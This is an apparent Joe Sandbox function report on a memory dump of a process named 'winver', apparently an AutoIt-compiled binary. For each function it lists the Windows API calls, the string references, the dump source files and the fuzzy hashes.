Function 00007FF63D83BC98 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00007FF63D83BCE5
SetMenu.USER32 ref: 00007FF63D83BCF8
GetMenuItemInfoW.USER32 ref: 00007FF63D83BD8B
IsMenu.USER32 ref: 00007FF63D83BDA5
CreatePopupMenu.USER32 ref: 00007FF63D83BDAF
InsertMenuItemW.USER32 ref: 00007FF63D83BDE5
DrawMenuBar.USER32 ref: 00007FF63D83BDEE

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID:
API String ID: 161812096-0
Opcode ID: eb112a0790aa608815d33d5714df695abef1efb8debb055b64049bbd35841b3c
Instruction ID: d24911abd2218fdb0ed79521f872e47e58bdb62f4d3e1c70120ba2b9a06ac956
Opcode Fuzzy Hash: eb112a0790aa608815d33d5714df695abef1efb8debb055b64049bbd35841b3c
Instruction Fuzzy Hash: 5D416B3AA05B4986EB50CFA6D8406AC37B5FB84B98F144036DE0D87768EF38F445D700

Function 00007FF63D83C2F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63D7962DC: CreateWindowExW.USER32 ref: 00007FF63D79636C
Part of subcall function 00007FF63D7962DC: GetStockObject.GDI32 ref: 00007FF63D796389
Part of subcall function 00007FF63D7962DC: SendMessageW.USER32 ref: 00007FF63D79639C

SendMessageW.USER32 ref: 00007FF63D83C3A0
SendMessageW.USER32 ref: 00007FF63D83C3B4
SendMessageW.USER32 ref: 00007FF63D83C3C8
SendMessageW.USER32 ref: 00007FF63D83C3DF
SendMessageW.USER32 ref: 00007FF63D83C3F7

Strings

Msctls_Progress32, xrefs: 00007FF63D83C326

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: f85598571b02aeb4630f54f76bee4ef9dec81ca596c6f652c4e431ea32c13059
Instruction ID: d8c19971d5c5821a596a90d135bc7b7fe2d4b66065fcc4d16c10a8456c1cb164
Opcode Fuzzy Hash: f85598571b02aeb4630f54f76bee4ef9dec81ca596c6f652c4e431ea32c13059
Instruction Fuzzy Hash: 8B31783660869187E3608F65F851B5AB761EB88790F108239EB9C43B98DF3CE4468F00

Function 00007FF63D7BA654 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 492COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7BA68F
_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7BAA60
_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7BAD01

Strings

f, xrefs: 00007FF63D7BA794
p, xrefs: 00007FF63D7BA79C

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$p
API String ID: 3215553584-1290815066
Opcode ID: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
Instruction ID: cf8c1eb183c674ab31fd42d71e6ad0b39bc0cd46f3fa2a04d69117f73caa2e45
Opcode Fuzzy Hash: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
Instruction Fuzzy Hash: B7129322E0C25B86FB20BB94E04467A7A71FB50754F944232D699877C8EFBDF580BB14

Function 00007FF63D7FBB08 Relevance: 9.2, APIs: 6, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00007FF63D7FBB1D
VariantClear.OLEAUT32 ref: 00007FF63D7FBBA2
VariantCopy.OLEAUT32 ref: 00007FF63D7FBBAE
VariantClear.OLEAUT32 ref: 00007FF63D7FBBB9
SysAllocString.OLEAUT32 ref: 00007FF63D7FBBE9
VariantCopy.OLEAUT32 ref: 00007FF63D7FBC4B

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 4e9952018e8465effc2ced5b54f3de0e409e99aa02bf13a2987630b898c2ca68
Instruction ID: 5985da294e249c6e9a2d2d8f40db8e56dc5bc36f60613a56eab29705a1a8131a
Opcode Fuzzy Hash: 4e9952018e8465effc2ced5b54f3de0e409e99aa02bf13a2987630b898c2ca68
Instruction Fuzzy Hash: 5C717F32A0824A92EA399FA595980BD63F9EF45B80F048036D74E87795FF3DF455E301

Function 00007FF63D79A390 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 119COMMON

Download Yara Rule

Strings

False, xrefs: 00007FF63D7E851C
True, xrefs: 00007FF63D7E8523
0x%p, xrefs: 00007FF63D7E8540
%.15g, xrefs: 00007FF63D79A418

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID:
String ID: %.15g$0x%p$False$True
API String ID: 0-2263619337
Opcode ID: 8c67fafce1013d322b21e2b0ca38abbb20278e3308247d758e6ba1e0d30a3d5f
Instruction ID: dcbe3628878aa65bf6563872d87a741b0af24c1b4a1a60c11d3a3973c933131a
Opcode Fuzzy Hash: 8c67fafce1013d322b21e2b0ca38abbb20278e3308247d758e6ba1e0d30a3d5f
Instruction Fuzzy Hash: C2518E72B09A4A85EB20DFA9D4441BC2375FB85B98F648231DA0D977D9FE39F401E380

Function 00007FF63D791AA8 Relevance: 9.1, APIs: 6, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63D7926F4: GetWindowLongPtrW.USER32 ref: 00007FF63D792711

BeginPaint.USER32 ref: 00007FF63D791AF0
GetWindowRect.USER32 ref: 00007FF63D791B5B
ScreenToClient.USER32 ref: 00007FF63D791B82
SetViewportOrgEx.GDI32 ref: 00007FF63D791B9D
EndPaint.USER32 ref: 00007FF63D791BFE
Rectangle.GDI32 ref: 00007FF63D7DA3A2

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: 65ceb82ef4a23b5c9242a30f3f087c1bbac73d844f271b97f3324bcf46736810
Instruction ID: 83c067122399a96e40845957955171f65fe8de09572c3b1dd42e212bf1462f8c
Opcode Fuzzy Hash: 65ceb82ef4a23b5c9242a30f3f087c1bbac73d844f271b97f3324bcf46736810
Instruction Fuzzy Hash: CF51BC72A08B8A82EB20CB96D4447B937B5FB85B94F044235CE5C87B95EF7CF409A700

Function 00007FF63D7FC4F4 Relevance: 9.1, APIs: 6, Instructions: 56stringCOMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(00007FF63D7FC440), ref: 00007FF63D7FC517
CLSIDFromProgID.OLE32 ref: 00007FF63D7FC549
ProgIDFromCLSID.OLE32 ref: 00007FF63D7FC568
lstrcmpiW.KERNEL32 ref: 00007FF63D7FC57A
CoTaskMemFree.OLE32 ref: 00007FF63D7FC58C
CLSIDFromString.OLE32 ref: 00007FF63D7FC59A

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: From$Prog$ExceptionFreeRaiseStringTasklstrcmpi
String ID:
API String ID: 450394209-0
Opcode ID: 15b1367b1a9902afb013806f13c0eddafb30bb70647bc90c42044b4717d19c01
Instruction ID: 5d3f27e86da890b21254e74dda15dc63293895e97c3548fc6cdc472976d0d37b
Opcode Fuzzy Hash: 15b1367b1a9902afb013806f13c0eddafb30bb70647bc90c42044b4717d19c01
Instruction Fuzzy Hash: 6A11873171864687E7248B56E85136963B8FF85BC4F284031EF4D87B54EF3DE4409700

Function 00007FF63D841E10 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63D792014: ExtCreatePen.GDI32 ref: 00007FF63D7920A3
Part of subcall function 00007FF63D792014: SelectObject.GDI32 ref: 00007FF63D7920B6
Part of subcall function 00007FF63D792014: BeginPath.GDI32 ref: 00007FF63D7920CF
Part of subcall function 00007FF63D792014: SelectObject.GDI32 ref: 00007FF63D7920F6

MoveToEx.GDI32 ref: 00007FF63D841E53
LineTo.GDI32 ref: 00007FF63D841E62
MoveToEx.GDI32 ref: 00007FF63D841E74
LineTo.GDI32 ref: 00007FF63D841E83
EndPath.GDI32 ref: 00007FF63D841E95
StrokePath.GDI32 ref: 00007FF63D841EA5

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 7f3a6454e582e84a66bd268a234b1bfcaf5165ed3782666a9c9758dd96bde1d7
Instruction ID: f6476cf7810c8f9951df61b36dae1a65ee01d61f2ef17693394e770e98ac2623
Opcode Fuzzy Hash: 7f3a6454e582e84a66bd268a234b1bfcaf5165ed3782666a9c9758dd96bde1d7
Instruction Fuzzy Hash: 7711CE31B1429782E7148F56B8057A97774EF86B84F084130CF0643B61EF7DF4499B40

Function 00007FF63D7B323C Relevance: 9.0, APIs: 6, Instructions: 39keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(?,?,?,00007FF63D79B139), ref: 00007FF63D7B326E
MapVirtualKeyW.USER32(?,?,?,00007FF63D79B139), ref: 00007FF63D7B327C
MapVirtualKeyW.USER32(?,?,?,00007FF63D79B139), ref: 00007FF63D7B328C
MapVirtualKeyW.USER32(?,?,?,00007FF63D79B139), ref: 00007FF63D7B329C
MapVirtualKeyW.USER32(?,?,?,00007FF63D79B139), ref: 00007FF63D7B32AA
MapVirtualKeyW.USER32(?,?,?,00007FF63D79B139), ref: 00007FF63D7B32B8

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 3db603ebcda9ab05a099d4736b30824e023632e047a77404b04740010422e8de
Instruction ID: db9e09875c2b78db36e2306edc2d3658e6d11ea2b8951ae58a56ac39fbdc2b50
Opcode Fuzzy Hash: 3db603ebcda9ab05a099d4736b30824e023632e047a77404b04740010422e8de
Instruction Fuzzy Hash: EC115E72916641CAE348CF79DC842593BB6FB98B08B188439C2498B365EF3AD4DAC700

Function 00007FF63D7947D4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

wcscpy.LIBCMT ref: 00007FF63D7948BE
Shell_NotifyIconW.SHELL32 ref: 00007FF63D7948CC
LoadStringW.USER32 ref: 00007FF63D7DB872

Strings

Line %d: , xrefs: 00007FF63D7DB8EB
AutoIt - , xrefs: 00007FF63D79484F

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: IconLoadNotifyShell_Stringwcscpy
String ID: Line %d: $AutoIt -
API String ID: 3135491444-4094128768
Opcode ID: 9b4600e7ffe4eedca3c386697b7b91116eee0b3446d0728ce775008dfb96c9f5
Instruction ID: 0a54a5a830e60ce3370b57882e6e7e90c47f688422cddec4d027a476ee5727d6
Opcode Fuzzy Hash: 9b4600e7ffe4eedca3c386697b7b91116eee0b3446d0728ce775008dfb96c9f5
Instruction Fuzzy Hash: CE413232A0CA8A96EB20EBA1D4511E96371FB85788F904131E64D8779AFE7CF509D740

Function 00007FF63D83A7FC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63D7962DC: CreateWindowExW.USER32 ref: 00007FF63D79636C
Part of subcall function 00007FF63D7962DC: GetStockObject.GDI32 ref: 00007FF63D796389
Part of subcall function 00007FF63D7962DC: SendMessageW.USER32 ref: 00007FF63D79639C

SendMessageW.USER32 ref: 00007FF63D83A8D5
LoadLibraryW.KERNEL32 ref: 00007FF63D83A8E2
SendMessageW.USER32 ref: 00007FF63D83A900
DestroyWindow.USER32 ref: 00007FF63D83A90E

Strings

SysAnimate32, xrefs: 00007FF63D83A874

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 000a67dee3da95ec8526779eae3a92228f7e99df318f690396067e1ef6858008
Instruction ID: a59e4a881aaa0053fe5b76c60d6f6270544e33f48497fc2a0fb7be44087834f5
Opcode Fuzzy Hash: 000a67dee3da95ec8526779eae3a92228f7e99df318f690396067e1ef6858008
Instruction Fuzzy Hash: E73192766087C5CAE7608F64E840BAA73A0FB85B90F554139DAAD87B84EF3CE445DB00

Function 00007FF63D7CF308 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7CF34D

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c67b3fe4af1802747bb47ffef2cd781eea30cae76dfd65f4a708413fe1c4c51b
Instruction ID: 01619c6099f09d71dee556d16ded853b996285f52fc2a09a880d9dc25255e67d
Opcode Fuzzy Hash: c67b3fe4af1802747bb47ffef2cd781eea30cae76dfd65f4a708413fe1c4c51b
Instruction Fuzzy Hash: E281D222F1A61A8DF7209FA598416BDA7B0BB44B94F004135DE0E93799EF3CF442E710

Function 00007FF63D7CEC7C Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000010,-00000090,00007FF63D7CF4AF), ref: 00007FF63D7CECD9
WideCharToMultiByte.KERNEL32 ref: 00007FF63D7CEDB5
WriteFile.KERNEL32 ref: 00007FF63D7CEDDB
WriteFile.KERNEL32 ref: 00007FF63D7CEE1A
GetLastError.KERNEL32 ref: 00007FF63D7CEE52

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
String ID:
API String ID: 3659116390-0
Opcode ID: 45cef86307722ba847a72932205bbf1e297e8754bad9d2f81c5b966e4bb0978b
Instruction ID: 4c07be48f3f7616caab854b0d34bea3cfef5ee3d9239142e224f3959a38596b3
Opcode Fuzzy Hash: 45cef86307722ba847a72932205bbf1e297e8754bad9d2f81c5b966e4bb0978b
Instruction Fuzzy Hash: 5D518B32E24A5589F710CBA5E4443AC7BB4FB48B98F048135DE5E87B99EF38E146D700

Function 00007FF63D7CC02C Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF63D7CC14E

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 231d60958c33e706b6d15f44aaddd88897fdd5662ca610be1b75a3e04c342f83
Instruction ID: 4bb9a3902a89f98d9db1e48a697d2516ce306893a21e801eab495d2a5bd57aed
Opcode Fuzzy Hash: 231d60958c33e706b6d15f44aaddd88897fdd5662ca610be1b75a3e04c342f83
Instruction Fuzzy Hash: 7D41B161F1AA0A96FA159B96AC046B563B5BF48FD0F094535ED2DCB784FE3CF444A300

Function 00007FF63D841364 Relevance: 7.6, APIs: 5, Instructions: 109COMMON

Download Yara Rule

APIs

ShowWindow.USER32 ref: 00007FF63D8413FB
EnableWindow.USER32 ref: 00007FF63D841426
ShowWindow.USER32 ref: 00007FF63D841490
ShowWindow.USER32 ref: 00007FF63D8414AC
EnableWindow.USER32 ref: 00007FF63D8414DA

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Window$Show$Enable
String ID:
API String ID: 2939132127-0
Opcode ID: 2e367821db80bd80a41d4070b5ddcf67f618bc4116100b5eafd1a20ee2a20530
Instruction ID: 7b8f3298ff40f185684a34d6ad587f25a470c4cdb6c65254a5b41fd9444c31db
Opcode Fuzzy Hash: 2e367821db80bd80a41d4070b5ddcf67f618bc4116100b5eafd1a20ee2a20530
Instruction Fuzzy Hash: 3B517736A0968A81EB60CB96D45477937B5EB84F88F284031CE4D87765EF3DF489E700

Function 00007FF63D792014 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32 ref: 00007FF63D7920A3
SelectObject.GDI32 ref: 00007FF63D7920B6
BeginPath.GDI32 ref: 00007FF63D7920CF
SelectObject.GDI32 ref: 00007FF63D7920F6

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: b6ec7b109939ba03cdb30485257bef9281de495fec9d9a58a0a828039dd4828f
Instruction ID: 506ab89becef8b352bc68d272cda0c5498f7c59d8550ddd7c06628f8b6c25c61
Opcode Fuzzy Hash: b6ec7b109939ba03cdb30485257bef9281de495fec9d9a58a0a828039dd4828f
Instruction Fuzzy Hash: 62318A32A0874ACAE7909F85A84077977B0FB84B90F840139DA4D83760EF7DF449EB00

Function 00007FF63D810F9C Relevance: 7.5, APIs: 5, Instructions: 33synchronizationthreadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,00007FF63D7DB813,?,?,?,00007FF63D7A1C32), ref: 00007FF63D810FD0
TerminateThread.KERNEL32(?,?,?,00007FF63D7DB813,?,?,?,00007FF63D7A1C32), ref: 00007FF63D810FDB
WaitForSingleObject.KERNEL32(?,?,?,00007FF63D7DB813,?,?,?,00007FF63D7A1C32), ref: 00007FF63D810FE9
~SyncLockT.VCCORLIB ref: 00007FF63D810FF2

Part of subcall function 00007FF63D81074C: CloseHandle.KERNEL32(?,?,?,00007FF63D810FF7,?,?,?,00007FF63D7DB813,?,?,?,00007FF63D7A1C32), ref: 00007FF63D81075D

LeaveCriticalSection.KERNEL32(?,?,?,00007FF63D7DB813,?,?,?,00007FF63D7A1C32), ref: 00007FF63D810FFE

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
